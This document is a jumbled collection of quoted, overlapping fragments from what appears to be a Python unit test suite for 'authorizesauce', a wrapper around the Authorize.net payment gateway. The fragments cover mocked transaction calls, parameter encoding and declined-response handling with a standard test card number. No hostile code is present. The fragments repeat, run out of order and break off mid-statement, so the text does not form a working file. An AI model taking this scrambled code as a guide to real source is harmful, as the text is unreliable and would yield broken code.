Address, CreditCard from authorizesauce.exceptions", "'b=%C3%A3&%C3%A3=1' )) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_make_call_connection_error(self, urlopen): urlopen.side_effect =", "self.assertEqual(params, { 'x_address': '45 Rose Ave', 'x_city': 'Venice', 'x_state': 'CA',", "urlopen.side_effect = self.success result = self.api._make_call({u('\\xe3'): '1', 'b': u('\\xe3')}) self.assertEqual(urlopen.call_args[0][0],", "params = self.api._add_params({}, credit_card=self.credit_card) self.assertEqual(params, { 'x_card_num': '4111111111111111', 'x_exp_date': '01-{0}'.format(self.year),", "'amount': '20.00', 'transaction_type': 'auth_only', 'avs_response': 'N', 'response_reason_code': '2', 'response_reason_text': 'This", "AuthorizeResponseError as e: self.assertTrue(str(e).startswith( 'This transaction has been declined.' 
))", "or SUCCESS self.error = lambda *args, **kwargs: ERROR.seek(0) or ERROR", "self.assertEqual(api.url, TEST_URL) api = TransactionAPI('123', '456', debug=False) self.assertEqual(api.url, PROD_URL) @mock.patch('authorizesauce.apis.transaction.urlopen')", "result = self.api.settle('123456') self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], ( 'https://test.authorize.net/gateway/transact.dll?x_login=123' '&x_trans_id=123456&x_version=3.1&x_delim_char=%3B' '&x_type=PRIOR_AUTH_CAPTURE&x_delim_data=TRUE&x_tran_key=456'", "self.assertRaises(AuthorizeConnectionError, self.api._make_call, {'a': '1', 'b': '2'}) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_make_call_response_error(self, urlopen):", "'2', 'response_reason_text': 'This transaction has been declined.', 'transaction_id': '2171062816', }", "self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_void(self, urlopen): urlopen.side_effect = self.success result", "'x_address=45+Rose+Ave&x_exp_date=01-{0}&x_test_request=FALSE' '&x_card_code=911&x_type=AUTH_ONLY&x_delim_data=TRUE'.format( str(self.year) ) )) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_capture(self,", "'1', 'response_reason_text': 'This transaction has been approved.', 'transaction_id': '2171062816', }", "'cvv_response': 'N', 'authorization_code': '000000', 'response_code': '2', 'amount': '20.00', 'transaction_type': 'auth_only',", "self.assertEqual(params, { 'x_card_num': '4111111111111111', 'x_exp_date': '01-{0}'.format(self.year), 'x_card_code': '911', }) params", "'2171062816', } ERROR = MockResponse( b'2;1;2;This transaction has been declined.;000000;N;2171062816;;;20.00;CC'", "Rose Ave', 'x_city': 'Venice', 'x_state': 'CA', 'x_zip': '90291', 'x_country': 'US',", "import BytesIO, binary_type, u from six.moves.urllib.parse import parse_qsl, urlencode from", "self.api._add_params({}, address=self.address) self.assertEqual(params, { 'x_address': '45 Rose Ave', 'x_city': 'Venice',", "import date from six import BytesIO, binary_type, u from six.moves.urllib.parse", "TEST_URL) self.assertTrue(_are_params_eq( urlopen.call_args[1]['data'], 'b=%C3%A3&%C3%A3=1' )) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_make_call_connection_error(self,", "or ERROR self.year = date.today().year + 10 self.credit_card = CreditCard('4111111111111111',", "} ERROR = MockResponse( b'2;1;2;This transaction has been declined.;000000;N;2171062816;;;20.00;CC' b';auth_only;;Jeffrey;Schenck;;45", "def _are_params_eq(params1, params2): _params1, _params2 = map(_unicode_str, (params1, params2)) return", "authorizesauce.data import Address, CreditCard from authorizesauce.exceptions import AuthorizeConnectionError, \\ AuthorizeResponseError", "'x_amount=20.00&x_tran_key=456&x_city=Venice&x_country=US&' 'x_version=3.1&x_state=CA&x_delim_char=%3B&' 'x_address=45+Rose+Ave&x_exp_date=01-{0}&x_test_request=FALSE' '&x_card_code=911&x_type=AUTH_ONLY&x_delim_data=TRUE'.format( str(self.year) ) )) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen')", "None def get_content_charset(self, failobj=None, *args, **kwargs): \"\"\"Python 3 version\"\"\" return", "'2'}) except AuthorizeResponseError as e: self.assertTrue(str(e).startswith( 'This transaction has been", "self.api.capture(20, self.credit_card, self.address) 
self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], ( 'x_login=123&x_zip=90291&x_card_num=4111111111111111&' 'x_amount=20.00&x_tran_key=456&x_city=Venice&x_country=US&' 'x_version=3.1&x_state=CA&x_delim_char=%3B&'", "# Test with specified amount result = self.api.settle('123456', amount=10) self.assertEqual(urlopen.call_args[0][0],", "urlopen.side_effect = self.success result = self.api.void('123456') self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], (", "has been declined.', 'transaction_id': '2171062816', } def _unicode_str(s): if isinstance(s,", "urlopen.side_effect = self.success result = self.api.auth(20, self.credit_card, self.address) self.assertEqual(urlopen.call_args[0][0], TEST_URL)", "'4111111111111111', 'x_exp_date': '01-{0}'.format(self.year), 'x_card_code': '911', }) params = self.api._add_params({}, address=self.address)", "'b': '2'}) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_make_call_response_error(self, urlopen): urlopen.side_effect = self.error try:", ") self.assertEqual(params, { 'x_card_num': '4111111111111111', 'x_exp_date': '01-{0}'.format(self.year), 'x_card_code': '911', 'x_address':", "TransactionAPI('123', '456') self.success = lambda *args, **kwargs: SUCCESS.seek(0) or SUCCESS", "amount result = self.api.credit('1111', '123456', 10) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], (", "PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_make_call_connection_error(self, urlopen): urlopen.side_effect = IOError('Borked') self.assertRaises(AuthorizeConnectionError, self.api._make_call,", "u('\\xe3')}) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(_are_params_eq( urlopen.call_args[1]['data'], 'b=%C3%A3&%C3%A3=1' )) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen')", "**kwargs) self.headers = self.Headers() SUCCESS = MockResponse( b'1;1;1;This transaction has", "'x_card_num': '4111111111111111', 'x_exp_date': '01-{0}'.format(self.year), 'x_card_code': '911', }) params = self.api._add_params({},", "urlopen.side_effect = IOError('Borked') self.assertRaises(AuthorizeConnectionError, self.api._make_call, {'a': '1', 'b': '2'}) @mock.patch('authorizesauce.apis.transaction.urlopen')", "*args, **kwargs): \"\"\"Python 3 version\"\"\" return failobj def __init__(self, *args,", "self.assertTrue(urlopen.call_args[1]['data'], ( 'x_login=123&x_zip=90291&x_card_num=4111111111111111&' 'x_amount=20.00&x_tran_key=456&x_city=Venice&x_country=US&' 'x_version=3.1&x_state=CA&x_delim_char=%3B&' 'x_address=45+Rose+Ave&x_exp_date=01-{0}&x_test_request=FALSE' '&x_card_code=911&x_type=AUTH_ONLY&x_delim_data=TRUE'.format( str(self.year) ) ))", "'123456', 10) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], ( 'https://test.authorize.net/gateway/transact.dll?x_login=123' '&x_trans_id=123456&x_version=3.1&x_amount=10.00' '&x_delim_char=%3B&x_type=CREDIT&x_card_num=1111' '&x_delim_data=TRUE&x_tran_key=456&x_test_request=FALSE'", "import mock from authorizesauce.apis.transaction import PROD_URL, TEST_URL, TransactionAPI from authorizesauce.data", "params = {'a': '1', 'b': '2'} result = self.api._make_call(params) self.assertEqual(urlopen.call_args[0][0],", "_params1, _params2 = map(_unicode_str, (params1, params2)) return frozenset(parse_qsl(_params1)) == frozenset(parse_qsl(_params2))", 
"urlopen): urlopen.side_effect = self.success result = self.api._make_call({u('\\xe3'): '1', 'b': u('\\xe3')})", "= self.error try: self.api._make_call({'a': '1', 'b': '2'}) except AuthorizeResponseError as", "{ 'x_card_num': '4111111111111111', 'x_exp_date': '01-{0}'.format(self.year), 'x_card_code': '911', 'x_address': '45 Rose", "{'a': '1', 'b': '2'}) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_make_call_response_error(self, urlopen): urlopen.side_effect =", "AuthorizeConnectionError, \\ AuthorizeResponseError class MockResponse(BytesIO): class Headers(dict): def getparam(self, *args,", "'2'}) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_make_call_response_error(self, urlopen): urlopen.side_effect = self.error try: self.api._make_call({'a':", "debug=False) self.assertEqual(api.url, PROD_URL) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_make_call(self, urlopen): urlopen.side_effect = self.success", "TransactionAPITests(TestCase): def setUp(self): self.api = TransactionAPI('123', '456') self.success = lambda", "PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_make_call_with_unicode(self, urlopen): urlopen.side_effect = self.success result =", "self.credit_card, self.address) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], ( 'x_login=123&x_zip=90291&x_card_num=4111111111111111&' 'x_amount=20.00&x_tran_key=456&x_city=Venice&x_country=US&' 'x_version=3.1&x_state=CA&x_delim_char=%3B&' 'x_address=45+Rose+Ave&x_exp_date=01-{0}&x_test_request=FALSE'", "test_void(self, urlopen): urlopen.side_effect = self.success result = self.api.void('123456') self.assertEqual(urlopen.call_args[0][0], TEST_URL)", "BytesIO.__init__(self, *args, **kwargs) self.headers = self.Headers() SUCCESS = MockResponse( b'1;1;1;This", "*args, **kwargs): BytesIO.__init__(self, *args, **kwargs) self.headers = self.Headers() SUCCESS =", "'b': '2'} result = self.api._make_call(params) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(_are_params_eq( urlopen.call_args[1]['data'], urlencode(params)", ")) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_make_call_connection_error(self, urlopen): urlopen.side_effect = IOError('Borked')", "lambda *args, **kwargs: SUCCESS.seek(0) or SUCCESS self.error = lambda *args,", "'&x_type=PRIOR_AUTH_CAPTURE&x_amount=10.00&x_delim_data=TRUE' '&x_tran_key=456&x_test_request=FALSE' )) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_credit(self, urlopen): urlopen.side_effect", "{ 'cvv_response': 'P', 'authorization_code': 'IKRAGJ', 'response_code': '1', 'amount': '20.00', 'transaction_type':", "PARSED_ERROR) def test_add_params(self): self.assertEqual(self.api._add_params({}), {}) params = self.api._add_params({}, credit_card=self.credit_card) self.assertEqual(params,", "import parse_qsl, urlencode from unittest2 import TestCase import mock from", "'911', }) params = self.api._add_params({}, address=self.address) self.assertEqual(params, { 'x_address': '45", "= lambda *args, **kwargs: ERROR.seek(0) or ERROR self.year = date.today().year", "'response_reason_text': 'This transaction has been declined.', 'transaction_id': '2171062816', } def", "amount result = self.api.settle('123456') self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], ( 
'https://test.authorize.net/gateway/transact.dll?x_login=123' '&x_trans_id=123456&x_version=3.1&x_delim_char=%3B'", "= TransactionAPI('123', '456') self.success = lambda *args, **kwargs: SUCCESS.seek(0) or", "failobj def __init__(self, *args, **kwargs): BytesIO.__init__(self, *args, **kwargs) self.headers =", "_unicode_str(s): if isinstance(s, binary_type): return s.decode('unicode_escape') return s def _are_params_eq(params1,", "'&x_trans_id=123456&x_version=3.1&x_delim_char=%3B' '&x_type=PRIOR_AUTH_CAPTURE&x_delim_data=TRUE&x_tran_key=456' '&x_test_request=FALSE' )) self.assertEqual(result, PARSED_SUCCESS) # Test with specified", "if isinstance(s, binary_type): return s.decode('unicode_escape') return s def _are_params_eq(params1, params2):", "*args, **kwargs: ERROR.seek(0) or ERROR self.year = date.today().year + 10", "= date.today().year + 10 self.credit_card = CreditCard('4111111111111111', self.year, 1, '911')", "**kwargs): \"\"\"Python 3 version\"\"\" return failobj def __init__(self, *args, **kwargs):", "# Test with transaction_id, amount result = self.api.credit('1111', '123456', 10)", "def test_make_call_with_unicode(self, urlopen): urlopen.side_effect = self.success result = self.api._make_call({u('\\xe3'): '1',", ") )) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_settle(self, urlopen): urlopen.side_effect =", "self.api._make_call({u('\\xe3'): '1', 'b': u('\\xe3')}) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(_are_params_eq( urlopen.call_args[1]['data'], 'b=%C3%A3&%C3%A3=1' ))", ")) self.assertEqual(result, PARSED_SUCCESS) # Test with specified amount result =", "failobj=None, *args, **kwargs): \"\"\"Python 3 version\"\"\" return failobj def __init__(self,", "def test_void(self, urlopen): urlopen.side_effect = self.success result = self.api.void('123456') self.assertEqual(urlopen.call_args[0][0],", "self.success result = self.api.capture(20, self.credit_card, self.address) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], (", "urlopen.side_effect = self.error try: self.api._make_call({'a': '1', 'b': '2'}) except AuthorizeResponseError", "urlopen): urlopen.side_effect = self.success params = {'a': '1', 'b': '2'}", "been approved.', 'transaction_id': '2171062816', } ERROR = MockResponse( b'2;1;2;This transaction", "'CA', 'x_zip': '90291', 'x_country': 'US', }) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_auth(self, urlopen):", "from six.moves.urllib.parse import parse_qsl, urlencode from unittest2 import TestCase import", "urlopen): urlopen.side_effect = IOError('Borked') self.assertRaises(AuthorizeConnectionError, self.api._make_call, {'a': '1', 'b': '2'})", "= self.success result = self.api.capture(20, self.credit_card, self.address) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'],", "from authorizesauce.exceptions import AuthorizeConnectionError, \\ AuthorizeResponseError class MockResponse(BytesIO): class Headers(dict):", "self.api.credit('1111', '123456', 10) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], ( 'https://test.authorize.net/gateway/transact.dll?x_login=123' '&x_trans_id=123456&x_version=3.1&x_amount=10.00' '&x_delim_char=%3B&x_type=CREDIT&x_card_num=1111'", "approved.', 'transaction_id': '2171062816', } ERROR = MockResponse( b'2;1;2;This transaction has", "frozenset(parse_qsl(_params1)) == 
frozenset(parse_qsl(_params2)) class TransactionAPITests(TestCase): def setUp(self): self.api = TransactionAPI('123',", "self.api.settle('123456', amount=10) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], ( 'https://test.authorize.net/gateway/transact.dll?x_login=123' '&x_trans_id=123456&x_version=3.1&x_delim_char=%3B' '&x_type=PRIOR_AUTH_CAPTURE&x_amount=10.00&x_delim_data=TRUE' '&x_tran_key=456&x_test_request=FALSE'", "s def _are_params_eq(params1, params2): _params1, _params2 = map(_unicode_str, (params1, params2))", "parse_qsl, urlencode from unittest2 import TestCase import mock from authorizesauce.apis.transaction", "from authorizesauce.apis.transaction import PROD_URL, TEST_URL, TransactionAPI from authorizesauce.data import Address,", "urlopen.call_args[1]['data'], 'b=%C3%A3&%C3%A3=1' )) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_make_call_connection_error(self, urlopen): urlopen.side_effect", "self.year = date.today().year + 10 self.credit_card = CreditCard('4111111111111111', self.year, 1,", "= Address('45 Rose Ave', 'Venice', 'CA', '90291') def test_basic_api(self): api", "'response_reason_text': 'This transaction has been approved.', 'transaction_id': '2171062816', } ERROR", "'01-{0}'.format(self.year), 'x_card_code': '911', 'x_address': '45 Rose Ave', 'x_city': 'Venice', 'x_state':", "address=self.address) self.assertEqual(params, { 'x_address': '45 Rose Ave', 'x_city': 'Venice', 'x_state':", "self.address) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], ( 'x_login=123&x_zip=90291&x_card_num=4111111111111111&' 'x_amount=20.00&x_tran_key=456&x_city=Venice&x_country=US&' 'x_version=3.1&x_state=CA&x_delim_char=%3B&' 'x_address=45+Rose+Ave&x_exp_date=01-{0}&x_test_request=FALSE' '&x_card_code=911&x_type=AUTH_ONLY&x_delim_data=TRUE'.format(", "self.assertEqual(result, PARSED_SUCCESS) # Test with specified amount result = self.api.settle('123456',", "from unittest2 import TestCase import mock from authorizesauce.apis.transaction import PROD_URL,", "Ave', 'Venice', 'CA', '90291') def test_basic_api(self): api = TransactionAPI('123', '456')", "= self.success params = {'a': '1', 'b': '2'} result =", "= {'a': '1', 'b': '2'} result = self.api._make_call(params) self.assertEqual(urlopen.call_args[0][0], TEST_URL)", "= lambda *args, **kwargs: SUCCESS.seek(0) or SUCCESS self.error = lambda", "declined.', 'transaction_id': '2171062816', } def _unicode_str(s): if isinstance(s, binary_type): return", "\"\"\"Python 3 version\"\"\" return failobj def __init__(self, *args, **kwargs): BytesIO.__init__(self,", "api = TransactionAPI('123', '456', debug=False) self.assertEqual(api.url, PROD_URL) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_make_call(self,", "self.assertTrue(urlopen.call_args[1]['data'], ( 'https://test.authorize.net/gateway/transact.dll?x_login=123' '&x_trans_id=123456&x_version=3.1&x_amount=10.00' '&x_delim_char=%3B&x_type=CREDIT&x_card_num=1111' '&x_delim_data=TRUE&x_tran_key=456&x_test_request=FALSE' )) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen')", "{'a': '1', 'b': '2'} result = self.api._make_call(params) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(_are_params_eq(", "s.decode('unicode_escape') return s def _are_params_eq(params1, params2): _params1, _params2 = map(_unicode_str,", "lambda *args, **kwargs: ERROR.seek(0) or ERROR 
self.year = date.today().year +", "test_make_call(self, urlopen): urlopen.side_effect = self.success params = {'a': '1', 'b':", "self.assertEqual(self.api._add_params({}), {}) params = self.api._add_params({}, credit_card=self.credit_card) self.assertEqual(params, { 'x_card_num': '4111111111111111',", "'https://test.authorize.net/gateway/transact.dll?x_login=123' '&x_trans_id=123456&x_version=3.1&x_delim_char=%3B' '&x_type=PRIOR_AUTH_CAPTURE&x_amount=10.00&x_delim_data=TRUE' '&x_tran_key=456&x_test_request=FALSE' )) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_credit(self,", "'2171062816', } def _unicode_str(s): if isinstance(s, binary_type): return s.decode('unicode_escape') return", ")) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_void(self, urlopen): urlopen.side_effect = self.success", "'IKRAGJ', 'response_code': '1', 'amount': '20.00', 'transaction_type': 'auth_only', 'avs_response': 'Y', 'response_reason_code':", "1, '911') self.address = Address('45 Rose Ave', 'Venice', 'CA', '90291')", "from six import BytesIO, binary_type, u from six.moves.urllib.parse import parse_qsl,", "'&x_delim_char=%3B&x_type=CREDIT&x_card_num=1111' '&x_delim_data=TRUE&x_tran_key=456&x_test_request=FALSE' )) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_void(self, urlopen): urlopen.side_effect", "been declined.', 'transaction_id': '2171062816', } def _unicode_str(s): if isinstance(s, binary_type):", "params2)) return frozenset(parse_qsl(_params1)) == frozenset(parse_qsl(_params2)) class TransactionAPITests(TestCase): def setUp(self): self.api", "Ave;Venice;CA;90291;USA;;;;;;;;;;;;' b';;;;;375DD9293D7605E20DF0B437EE2A7B92;N;1;;;;;;;;;;;XXXX1111;Visa;;;;;;;' b';;;;;;;;;;Y') PARSED_ERROR = { 'cvv_response': 'N', 'authorization_code': '000000',", "TEST_URL) self.assertTrue(_are_params_eq( urlopen.call_args[1]['data'], urlencode(params) )) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_make_call_with_unicode(self,", "@mock.patch('authorizesauce.apis.transaction.urlopen') def test_credit(self, urlopen): urlopen.side_effect = self.success # Test with", "return s def _are_params_eq(params1, params2): _params1, _params2 = map(_unicode_str, (params1,", "except AuthorizeResponseError as e: self.assertTrue(str(e).startswith( 'This transaction has been declined.'", "params = self.api._add_params({}, address=self.address) self.assertEqual(params, { 'x_address': '45 Rose Ave',", "= self.success result = self.api.auth(20, self.credit_card, self.address) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'],", "TEST_URL, TransactionAPI from authorizesauce.data import Address, CreditCard from authorizesauce.exceptions import", "amount=10) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], ( 'https://test.authorize.net/gateway/transact.dll?x_login=123' '&x_trans_id=123456&x_version=3.1&x_delim_char=%3B' '&x_type=PRIOR_AUTH_CAPTURE&x_amount=10.00&x_delim_data=TRUE' '&x_tran_key=456&x_test_request=FALSE' ))", "'x_zip': '90291', 'x_country': 'US', }) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_auth(self, urlopen): urlopen.side_effect", "'&x_card_code=911&x_type=AUTH_ONLY&x_delim_data=TRUE'.format( str(self.year) ) )) self.assertEqual(result, PARSED_SUCCESS) 
@mock.patch('authorizesauce.apis.transaction.urlopen') def test_settle(self, urlopen):", "Ave', 'x_city': 'Venice', 'x_state': 'CA', 'x_zip': '90291', 'x_country': 'US', })", "= self.api._make_call({u('\\xe3'): '1', 'b': u('\\xe3')}) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(_are_params_eq( urlopen.call_args[1]['data'], 'b=%C3%A3&%C3%A3=1'", "'456', debug=False) self.assertEqual(api.url, PROD_URL) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_make_call(self, urlopen): urlopen.side_effect =", "api = TransactionAPI('123', '456') self.assertEqual(api.url, TEST_URL) api = TransactionAPI('123', '456',", "AuthorizeResponseError class MockResponse(BytesIO): class Headers(dict): def getparam(self, *args, **kwargs): \"\"\"Python", "transaction has been declined.;000000;N;2171062816;;;20.00;CC' b';auth_only;;Jeffrey;Schenck;;45 Rose Ave;Venice;CA;90291;USA;;;;;;;;;;;;' b';;;;;375DD9293D7605E20DF0B437EE2A7B92;N;1;;;;;;;;;;;XXXX1111;Visa;;;;;;;' b';;;;;;;;;;Y') PARSED_ERROR", "self.headers = self.Headers() SUCCESS = MockResponse( b'1;1;1;This transaction has been", "frozenset(parse_qsl(_params2)) class TransactionAPITests(TestCase): def setUp(self): self.api = TransactionAPI('123', '456') self.success", "test_settle(self, urlopen): urlopen.side_effect = self.success # Test without specified amount", "self.api._make_call(params) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(_are_params_eq( urlopen.call_args[1]['data'], urlencode(params) )) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen')", "self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], ( 'https://test.authorize.net/gateway/transact.dll?x_login=123' '&x_trans_id=123456&x_version=3.1&x_delim_char=%3B' '&x_type=PRIOR_AUTH_CAPTURE&x_delim_data=TRUE&x_tran_key=456' '&x_test_request=FALSE' )) self.assertEqual(result,", "test_make_call_with_unicode(self, urlopen): urlopen.side_effect = self.success result = self.api._make_call({u('\\xe3'): '1', 'b':", "self.success # Test without specified amount result = self.api.settle('123456') self.assertEqual(urlopen.call_args[0][0],", "return failobj def __init__(self, *args, **kwargs): BytesIO.__init__(self, *args, **kwargs) self.headers", "'01-{0}'.format(self.year), 'x_card_code': '911', }) params = self.api._add_params({}, address=self.address) self.assertEqual(params, {", "self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(_are_params_eq( urlopen.call_args[1]['data'], urlencode(params) )) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def", "address=self.address ) self.assertEqual(params, { 'x_card_num': '4111111111111111', 'x_exp_date': '01-{0}'.format(self.year), 'x_card_code': '911',", "six import BytesIO, binary_type, u from six.moves.urllib.parse import parse_qsl, urlencode", "'&x_trans_id=123456&x_version=3.1&x_amount=10.00' '&x_delim_char=%3B&x_type=CREDIT&x_card_num=1111' '&x_delim_data=TRUE&x_tran_key=456&x_test_request=FALSE' )) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_void(self, urlopen):", "binary_type): return s.decode('unicode_escape') return s def _are_params_eq(params1, params2): _params1, _params2", "six.moves.urllib.parse import parse_qsl, urlencode from unittest2 import TestCase import mock", "'x_address': '45 Rose Ave', 'x_city': 'Venice', 'x_state': 'CA', 'x_zip': '90291',", "result = self.api.capture(20, 
self.credit_card, self.address) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], ( 'x_login=123&x_zip=90291&x_card_num=4111111111111111&'", "def get_content_charset(self, failobj=None, *args, **kwargs): \"\"\"Python 3 version\"\"\" return failobj", "'x_card_code': '911', 'x_address': '45 Rose Ave', 'x_city': 'Venice', 'x_state': 'CA',", "self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], ( 'x_login=123&x_zip=90291&x_card_num=4111111111111111&' 'x_amount=20.00&x_tran_key=456&x_city=Venice&x_country=US&' 'x_version=3.1&x_state=CA&x_delim_char=%3B&' 'x_address=45+Rose+Ave&x_exp_date=01-{0}&x_test_request=FALSE' '&x_card_code=911&x_type=AUTH_ONLY&x_delim_data=TRUE'.format( str(self.year)", "def getparam(self, *args, **kwargs): \"\"\"Python 2 version\"\"\" return None def", "TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], ( 'x_login=123&x_zip=90291&x_card_num=4111111111111111&' 'x_amount=20.00&x_tran_key=456&x_city=Venice&x_country=US&' 'x_version=3.1&x_state=CA&x_delim_char=%3B&' 'x_address=45+Rose+Ave&x_exp_date=01-{0}&x_test_request=FALSE' '&x_card_code=911&x_type=AUTH_ONLY&x_delim_data=TRUE'.format( str(self.year) )", "'https://test.authorize.net/gateway/transact.dll?x_login=123' '&x_trans_id=123456&x_version=3.1&x_amount=10.00' '&x_delim_char=%3B&x_type=CREDIT&x_card_num=1111' '&x_delim_data=TRUE&x_tran_key=456&x_test_request=FALSE' )) self.assertEqual(result, PARSED_SUCCESS) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_void(self,", "self.error = lambda *args, **kwargs: ERROR.seek(0) or ERROR self.year =", "= map(_unicode_str, (params1, params2)) return frozenset(parse_qsl(_params1)) == frozenset(parse_qsl(_params2)) class TransactionAPITests(TestCase):", "b';auth_only;;Jeffrey;Schenck;;<NAME>;Venice;CA;90291;USA;;;;;;;;;;;;' b';;;;;375DD9293D7605E20DF0B437EE2A7B92;P;2;;;;;;;;;;;XXXX1111;Visa;;;;;;;' b';;;;;;;;;;Y') PARSED_SUCCESS = { 'cvv_response': 'P', 'authorization_code': 'IKRAGJ',", "@mock.patch('authorizesauce.apis.transaction.urlopen') def test_settle(self, urlopen): urlopen.side_effect = self.success # Test without", "version\"\"\" return failobj def __init__(self, *args, **kwargs): BytesIO.__init__(self, *args, **kwargs)", "'1', 'b': '2'}) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_make_call_response_error(self, urlopen): urlopen.side_effect = self.error", "= self.success # Test with transaction_id, amount result = self.api.credit('1111',", "= self.api.settle('123456', amount=10) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], ( 'https://test.authorize.net/gateway/transact.dll?x_login=123' '&x_trans_id=123456&x_version=3.1&x_delim_char=%3B' '&x_type=PRIOR_AUTH_CAPTURE&x_amount=10.00&x_delim_data=TRUE'", "result = self.api._make_call({u('\\xe3'): '1', 'b': u('\\xe3')}) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(_are_params_eq( urlopen.call_args[1]['data'],", ")) self.assertEqual(e.full_response, PARSED_ERROR) def test_add_params(self): self.assertEqual(self.api._add_params({}), {}) params = self.api._add_params({},", "*args, **kwargs: SUCCESS.seek(0) or SUCCESS self.error = lambda *args, **kwargs:", "TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], ( 'https://test.authorize.net/gateway/transact.dll?x_login=123' '&x_trans_id=123456&x_version=3.1&x_delim_char=%3B' '&x_type=PRIOR_AUTH_CAPTURE&x_delim_data=TRUE&x_tran_key=456' '&x_test_request=FALSE' )) 
self.assertEqual(result, PARSED_SUCCESS)", "urlopen): urlopen.side_effect = self.success # Test without specified amount result", "been approved.;IKRAGJ;Y;2171062816;;;20.00;CC' b';auth_only;;Jeffrey;Schenck;;<NAME>;Venice;CA;90291;USA;;;;;;;;;;;;' b';;;;;375DD9293D7605E20DF0B437EE2A7B92;P;2;;;;;;;;;;;XXXX1111;Visa;;;;;;;' b';;;;;;;;;;Y') PARSED_SUCCESS = { 'cvv_response': 'P',", "self.api._make_call, {'a': '1', 'b': '2'}) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_make_call_response_error(self, urlopen): urlopen.side_effect", "'x_state': 'CA', 'x_zip': '90291', 'x_country': 'US', }) @mock.patch('authorizesauce.apis.transaction.urlopen') def test_auth(self,", "has been approved.', 'transaction_id': '2171062816', } ERROR = MockResponse( b'2;1;2;This", "result = self.api.credit('1111', '123456', 10) self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], ( 'https://test.authorize.net/gateway/transact.dll?x_login=123'", "without specified amount result = self.api.settle('123456') self.assertEqual(urlopen.call_args[0][0], TEST_URL) self.assertTrue(urlopen.call_args[1]['data'], (", "result = self.api.settle('123456', amount=10) self.assertEqual(urlopen.call_args[0][0], TEST_URL) 